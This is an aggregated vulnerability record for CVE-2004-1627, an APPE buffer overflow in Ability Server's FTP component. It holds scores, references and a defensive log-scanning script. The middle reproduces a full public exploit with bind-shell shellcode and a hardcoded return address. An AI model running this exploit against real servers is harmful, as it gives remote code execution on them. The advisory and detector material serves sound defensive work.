CVE-2004-1627
CVSS 7.5
Published: 2004-10-22 00:00:00
Last modified: 2008-09-05 16:41:55

[Original] Buffer overflow in Ability Server 2.25, 2.32, 2.34, and possibly other versions, allows remote attackers to execute arbitrary code via a long APPE command.


[CNNVD] Code-Crafters Ability Server FTP STOR and APPE Argument Remote Buffer Overflow Vulnerability (CNNVD-200410-088)

Ability Server versions 2.25, 2.32, 2.34 and possibly other versions are affected. A remote attacker can execute arbitrary code via an overly long APPE command.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance may degrade or access to resources may be interrupted]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

cpe:/a:code-crafters:ability_server:2.3.4
cpe:/a:code-crafters:ability_server:2.2.5
cpe:/a:code-crafters:ability_server:2.3.2

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1627
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1627
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200410-088
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/11508
(VENDOR_ADVISORY)  BID  11508
http://securitytracker.com/id?1012464
(VENDOR_ADVISORY)  SECTRACK  1012464
http://secunia.com/advisories/12941
(VENDOR_ADVISORY)  SECUNIA  12941
http://lists.virus.org/dw-0day-0412/msg00004.html
(VENDOR_ADVISORY)  MLIST  [0day] 20041208 Ability Server 2.25 - 2.34 FTP => 'APPE' Buffer Overflow - PnK:: DCN3T
http://xforce.iss.net/xforce/xfdb/18405
(UNKNOWN)  XF  ability-appe-bo(18405)
http://www.osvdb.org/12347
(UNKNOWN)  OSVDB  12347

- Vulnerability information

Code-Crafters Ability Server FTP STOR and APPE Argument Remote Buffer Overflow Vulnerability
High severity  Buffer overflow
2004-10-22 00:00:00 2005-10-20 00:00:00
Remote
Ability Server versions 2.25, 2.32, 2.34 and possibly other versions are affected. A remote attacker can execute arbitrary code via an overly long APPE command.

- Advisories and patches

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- Vulnerability information (592)

Ability Server <= 2.34 (APPE) Remote Buffer Overflow Exploit (EDBID:592)
windows remote
2004-10-23 Verified
21 KaGra
N/A
##################################################
##                                              ##
##              Ability Ftp Server 2.34         ##
##        Remote exploit in APPE command        ##
##        discovered,exploited by KaGra         ##
## Use it with netcat: exploit.py|nc (host) 21  ##
##     BindShell at port 4444,one shot OnLy!    ##
##################################################


import struct
shell = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"
shell += "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"
shell += "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa"
shell += "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f"
shell += "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb"
shell += "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba"
shell += "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"
shell += "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"
shell += "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"
shell += "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"
shell += "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"
shell += "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"
shell += "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"
shell += "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"
shell += "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"
shell += "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"
shell += "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"
shell += "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0"
shell += "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"
shell += "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"
shell += "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"
shell += "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"
shell += "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"
shell += "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"
shell += "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"
buffer = '\x41'*968+struct.pack('<L', 0x77da76af)+'\x42'*32+shell # JMP ESP=>0x77da76af Windows XP SP1 EngLisH 


print "USER kagra"#      Enter a valid username HeRe!
print "PASS kagra"#  Enter a valid password HeRe!
print "APPE " + buffer

# milw0rm.com [2004-10-23]

- Vulnerability information

12347
Ability Server APPE Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

A remote overflow exists in Ability Server. The application fails to perform proper bounds checking resulting in a buffer overflow. By issuing an overly long string to the 'APPE' command, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2004-12-08 Unknown
Unknown Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- References

- Vulnerability author

- Vulnerability information

Code-Crafters Ability Server FTP STOR And APPE Arguments Remote Buffer Overflow Vulnerability
Boundary Condition Error 11508
Yes No
2004-10-22 12:00:00 2009-07-12 08:06:00
Exploit code was provided by muts@whitehat.co.il and Dark Eagle. The discoverer of this issue is currently unknown. Further information about the APPE command was provided by Justin Walpole.

- Affected software versions

Code-Crafters Ability Server 2.3.4
Code-Crafters Ability Server 2.3.2
Code-Crafters Ability Server 2.2.5

- Discussion

Ability Server is reported prone to a remote buffer overflow vulnerability. This issue affects the FTP component of the application and arises due to insufficient boundary checks performed by the FTP server.

A successful attack can result in memory corruption leading to a crash, however, if an attacker is able to overwrite sensitive memory addresses, they could execute code on a computer. Arbitrary code execution occurs in the context of the FTP process and may result in unauthorized access to the vulnerable computer.

Ability Server versions 2.34 and prior were identified to be vulnerable to this issue.
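As an added defensive example (not part of this record or of the vendor's code), the check below parses FTP control-channel commands and flags STOR/APPE arguments that have the shape of the overflow described above: far longer than a filename, non-printable bytes, or long runs of one padding byte. The thresholds, the regex and the sample session are assumptions constructed for the example.

```python
import re

# Assumed thresholds (not values from the advisory): an argument longer than MAX_ARG_LEN or a run of PAD_RUN identical bytes is treated as anomalous.
MAX_ARG_LEN = 255
PAD_RUN = 64
# The advisory names the STOR and APPE handlers as the overflowable ones.
WRITE_COMMANDS = {"APPE", "STOR"}
# RFC 959 verbs are 3-4 letters, optionally followed by an argument.
FTP_CMD_RE = re.compile(r"^([A-Za-z]{3,4})(?:[ \t]+(.*))?$", re.DOTALL)

def parse_ftp_command(line):
    """Return (VERB, argument) for one control-channel line, or None."""
    m = FTP_CMD_RE.match(line.rstrip("\r\n"))
    if not m:
        return None
    return m.group(1).upper(), m.group(2) or ""

def assess_command(line):
    """List the reasons a STOR/APPE line looks like an overflow attempt."""
    parsed = parse_ftp_command(line)
    if parsed is None:
        return {"cmd": None, "reasons": []}
    cmd, arg = parsed
    reasons = []
    if cmd in WRITE_COMMANDS:
        if len(arg) > MAX_ARG_LEN:
            reasons.append("argument length %d > %d" % (len(arg), MAX_ARG_LEN))
        if any(not 0x20 <= ord(c) <= 0x7E for c in arg):
            reasons.append("argument contains non-printable bytes")
        if re.search(r"(.)\1{%d,}" % (PAD_RUN - 1), arg, re.DOTALL):
            reasons.append("argument has a run of %d+ identical bytes" % PAD_RUN)
    return {"cmd": cmd, "reasons": reasons}

def scan_session(lines):
    """Return [(line_no, verb, reasons)] for every suspicious line."""
    hits = []
    for n, line in enumerate(lines, 1):
        r = assess_command(line)
        if r["reasons"]:
            hits.append((n, r["cmd"], r["reasons"]))
    return hits

# Constructed sample session: a normal upload, then an APPE whose argument has the padding / address bytes / payload shape of the published exploit.
SAMPLE_SESSION = [
    "USER alice",
    "STOR reports/q3.txt",
    "APPE " + "A" * 968 + "\x90" * 4 + "B" * 32 + "\xcc" * 16,
    "QUIT",
]
```

Run `scan_session` over the control-channel lines of a captured session or an FTP server's command log; a benign RETR or STOR with a normal path produces no hit.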

- Exploit

The following exploits are available:

- Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- References

